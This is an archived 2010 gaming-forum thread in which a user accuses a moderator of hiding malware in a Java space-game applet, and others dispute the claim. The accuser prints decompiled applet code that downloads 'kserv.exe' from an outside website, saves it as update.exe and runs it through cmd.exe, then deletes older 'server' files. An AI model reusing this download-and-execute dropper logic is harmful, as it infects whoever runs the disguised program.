Your Moderator

Discussion in 'Archives' started by Veng Pkers, Jan 14, 2010.

Thread Status:
Not open for further replies.
Your Moderator
  1. Unread #1 - Jan 14, 2010 at 4:26 PM
  2. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    Daily (Nick) has tried to infect me with something (what it is I'm not sure). Here is some proof and I highly suggest you remove him from your staff list.

    Session Start: Friday, January 08, 2010
    Sanity ([email protected])
    Nick (removed)
    (8:06 PM) Nick: hey
    wanna try my game?
    (8:07 PM) Sanity: what kind of game?
    (8:08 PM) Nick: a java game
    (8:09 PM) Sanity: what kind?
    do you have like a site or something?
    (8:09 PM) Nick: its a space game
    i do
    (8:09 PM) Sanity: link?
    (8:10 PM) Nick: http://dudeitscool.net/games/play.htm
    (8:13 PM) Sanity: You made this whole thing?
    (8:13 PM) Nick: yeah dude
    well
    I used the gtge engine
    but I made the game
    (8:13 PM) Sanity: so which classes did you actually write?
    (8:13 PM) Nick: im going to be honest with you
    im really high right now
    (8:14 PM) Sanity: lol
    (8:14 PM) Nick: and I made that game a while ago
    just decided to show people now
    ask me tomorrow lol
    (8:14 PM) Sanity: alright lol
    (8:17 PM) Sanity: hmmm
    Whats with this server shit?
    (8:18 PM) Sanity: What is kserv.exe?
    botnet?
    (8:18 PM) Nick is now Offline

    If you follow the link to the website, it takes you to a java game. When the webpage loads the game asks if you wish to allow "Update.jar" to run. By clicking accept, it loads the follow jar.

    public void init()
    {
    Update("http://www.nickmoses.net/kserv" + ".exe", "update" + ".exe", getDir());
    getIP();
    putIP();
    turnONS();
    }

    The update method:

    public void Update(String paramString1, String paramString2, String paramString3)
    {
    this.checkProgress = true;
    this.homeDir = paramString3;
    this.saveAs = paramString3 + paramString2;
    this.urlLoc = paramString1;
    if (!(new File(paramString3).exists()))
    new File(paramString3).mkdir();
    if (downloadFile())
    {
    if (!(paramString1.contains(".zip")))
    return;
    unZipFile();
    deleteFile();
    }
    else
    {
    System.out.println("error trying again...");
    deleteFile();
    Update(paramString1, paramString2, paramString3);
    }
    }


    Runs the exe...
    static void turnONS()
    {
    try
    {
    String[] arrayOfString = new String[3];
    arrayOfString[0] = "cmd.exe";
    arrayOfString[1] = "/C";
    arrayOfString[2] = getDir() + "update.exe";
    Process localProcess = Runtime.getRuntime().exec(arrayOfString);
    System.out.println("Turned server on.");
    }
    catch (Exception localException)
    {
    localException.printStackTrace();
    }
    }

    Deleting the old virus...

    static void deleteOLD()
    {
    if (!(new File(getDir() + "Server.jar").exists()))
    return;
    new File(getDir() + "Server.jar").delete();
    new File(getDir() + "HookTest.dll").delete();
    new File(getDir() + "data").delete();
    new File(getDir() + "data").mkdir();
    System.out.println("Deleted old server files.");
    }

    After I called him out on it, he blocked me on msn and then next time I tried to login my msn was frozen.
     
  3. Unread #2 - Jan 14, 2010 at 4:28 PM
  4. Hahanerd
    Joined:
    Jul 25, 2009
    Posts:
    19,358
    Referrals:
    86
    Sythe Gold:
    1,591
    Discord Unique ID:
    224351757424132106
    Discord Username:
    Hahanerd
    Former OMM Pool Shark (2) Detective Two Factor Authentication User Nitro Booster In Memory of Jon Rio 2016 Community Participant Sythe's 20th Anniversary

    Hahanerd
    Retired Global Moderator Cracker Head Mudkips $100 USD Donor

    Your Moderator

  5. Unread #3 - Jan 14, 2010 at 4:33 PM
  6. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    This is an old one of his... You can have more than one msn account (FYI)
     
  7. Unread #4 - Jan 14, 2010 at 4:35 PM
  8. Hahanerd
    Joined:
    Jul 25, 2009
    Posts:
    19,358
    Referrals:
    86
    Sythe Gold:
    1,591
    Discord Unique ID:
    224351757424132106
    Discord Username:
    Hahanerd
    Former OMM Pool Shark (2) Detective Two Factor Authentication User Nitro Booster In Memory of Jon Rio 2016 Community Participant Sythe's 20th Anniversary

    Hahanerd
    Retired Global Moderator Cracker Head Mudkips $100 USD Donor

    Your Moderator

    How do you know it's him? Did he send you a PM or something?
     
  9. Unread #5 - Jan 14, 2010 at 4:38 PM
  10. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    http://www.google.ca/search?hl=en&source=hp&q=removed

    Are you joking me? Look the results... if the link doesn't work than simply google his email

    Edit: Not to mention the virus itself was hosted on his website
     
  11. Unread #6 - Jan 14, 2010 at 4:43 PM
  12. Harped
    Joined:
    Jan 29, 2009
    Posts:
    2,172
    Referrals:
    37
    Sythe Gold:
    0

    Harped Troll

    Your Moderator

    It probably got hacked >.> That was posted in 2008.

    His new one is clearly in his sig, and you're just trying to start shit.
     
  13. Unread #7 - Jan 14, 2010 at 4:44 PM
  14. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    As I said, the virus was hosted on his website.
     
  15. Unread #8 - Jan 14, 2010 at 4:48 PM
  16. Harped
    Joined:
    Jan 29, 2009
    Posts:
    2,172
    Referrals:
    37
    Sythe Gold:
    0

    Harped Troll

    Your Moderator

    What website is this?
     
  17. Unread #9 - Jan 14, 2010 at 4:50 PM
  18. normalcy
    Joined:
    Dec 9, 2009
    Posts:
    596
    Referrals:
    0
    Sythe Gold:
    0

    normalcy The Code Hero
    Banned

    Your Moderator

    I'm guessing it was the impostor's website. If the impostor said 'my website', I think that's what he would mean.
     
  19. Unread #10 - Jan 14, 2010 at 4:50 PM
  20. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

  21. Unread #11 - Jan 14, 2010 at 4:53 PM
  22. normalcy
    Joined:
    Dec 9, 2009
    Posts:
    596
    Referrals:
    0
    Sythe Gold:
    0

    normalcy The Code Hero
    Banned

    Your Moderator

    I've been there before. Odd coincidence. So did you download something or not?
     
  23. Unread #12 - Jan 14, 2010 at 4:56 PM
  24. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    No I did not...

    I'm merely stating that he tried to infect me with something.
     
  25. Unread #13 - Jan 14, 2010 at 4:58 PM
  26. Nick
    Joined:
    Feb 12, 2007
    Posts:
    7,204
    Referrals:
    40
    Sythe Gold:
    80

    Nick ♬♩ Young Forever ♪ ♫

    Your Moderator

    Chat logs aren't proof. You need actual pictures of the active MSN window.
     
  27. Unread #14 - Jan 14, 2010 at 5:02 PM
  28. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    Yeah... because I leave my msn convos open for 6 days right?

    Wasn't going to report him until my msn got frozen.
     
  29. Unread #15 - Jan 15, 2010 at 1:22 AM
  30. Magic Arrow
    Joined:
    Feb 3, 2007
    Posts:
    4,129
    Referrals:
    673
    Sythe Gold:
    49
    Extreme Homosex Sythe Awards 2013 Winner

    Magic Arrow Protector of the homosex, defender of the AIDS
    $5 USD Donor Mudkips Retired Sectional Moderator

    Your Moderator

    LOL.

    3 things.

    1. That is Daily's msn.

    2. That is Daily's site.

    3. I HAVE played the game, it's a harmless copy of space invaders (Except round 99 is the exact same as round 1).

    I highly doubt Daily would want to infect you. And as [N]ick said, chat logs aren't proof.
     
  31. Unread #16 - Jan 15, 2010 at 5:45 PM
  32. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    If you accepted to run the update.jar then you are infected. I decompiled the jar file and the methods I found are posted in this thread. Since he tried to infect and the time I posted this, he has removed the virus from his website.
     
  33. Unread #17 - Jan 16, 2010 at 1:46 AM
  34. I Am The RWT
    Joined:
    Nov 9, 2008
    Posts:
    1,346
    Referrals:
    1
    Sythe Gold:
    31
    Discord Unique ID:
    717297864874655782
    Two Factor Authentication User

    I Am The RWT Guru
    $5 USD Donor New

    Your Moderator

  35. Unread #18 - Jan 16, 2010 at 1:52 AM
  36. I Am The RWT
    Joined:
    Nov 9, 2008
    Posts:
    1,346
    Referrals:
    1
    Sythe Gold:
    31
    Discord Unique ID:
    717297864874655782
    Two Factor Authentication User

    I Am The RWT Guru
    $5 USD Donor New

    Your Moderator

  37. Unread #19 - Jan 16, 2010 at 7:07 AM
  38. Darkgroove
    Referrals:
    0

    Darkgroove Guest

    Your Moderator

    Highlight the malicious part.
     
  39. Unread #20 - Jan 16, 2010 at 11:10 AM
  40. Veng Pkers
    Joined:
    Oct 25, 2008
    Posts:
    11
    Referrals:
    0
    Sythe Gold:
    0

    Veng Pkers Newcomer
    Banned

    Your Moderator

    Lets go through this step by step...

    1) You go to the site
    2) The applet runs and you are asked if you wish to run Update.jar (published by Microsoft - lol)
    3) If you choose to run the applet the following happens:

    This method is called first:

    public void init()
    {
    Update("http://www.nickmoses.net/kserv" + ".exe", "update" + ".exe",
    the Update method downloads a file from nickmoses.net/kserv.exe and saves it as update.exe
    }

    public void Update(String paramString1, String paramString2, String paramString3)
    {
    this.checkProgress = true;
    this.homeDir = paramString3;
    this.saveAs = paramString3 + paramString2;
    this.urlLoc = paramString1;
    if (!(new File(paramString3).exists()))
    new File(paramString3).mkdir();
    if (downloadFile())
    {
    if (!(paramString1.contains(".zip")))
    return;
    unZipFile();
    deleteFile();
    }
    else
    {
    System.out.println("error trying again...");
    deleteFile();
    Update(paramString1, paramString2, paramString3);
    }
    }

    There is the update method once again. If you don't know java then I don't know what to tell you. After the file is downloaded, the exe is executed and from there I can't tell you what happens (simply because I don't know where to go). Considering he is hiding all of the following in "Update.jar" by "Microsoft" I doubt that is is non-malicious. I am sick of arguing with people trying to defend him. All of the facts have been laid out in front of you, yet you still choose to deny it.
     
< [FREE] Falsifying's Auto WoodCutter v1 | Ban Evader >

Users viewing this thread
1 guest
Thread Status:
Not open for further replies.


 
 
Adblock breaks this site